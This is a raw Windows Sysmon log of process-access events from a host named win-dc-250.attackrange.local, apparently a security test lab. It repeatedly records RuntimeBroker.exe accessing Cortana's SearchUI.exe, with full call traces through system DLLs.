13:30:12.326{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12277|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012143Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.326{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12149|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012142Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.326{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+124d1|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012141Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.326{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12383|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012140Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.326{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12277|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012139Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.326{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12149|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012138Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.326{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+124d1|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012137Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.326{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12383|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012136Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.326{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12277|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012135Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.326{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12149|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012134Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.326{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+13d1e|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1382d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11706|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11059|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9 10341000x800000000000000012133Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.326{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+13711|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11706|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11059|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000012132Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.326{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+13624|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11706|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11059|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000012131Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.326{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11620|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11059|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012130Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.326{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+124d1|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012129Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.326{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12383|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012128Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.326{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12277|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012127Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.326{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12149|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012126Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.326{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+124d1|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012125Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 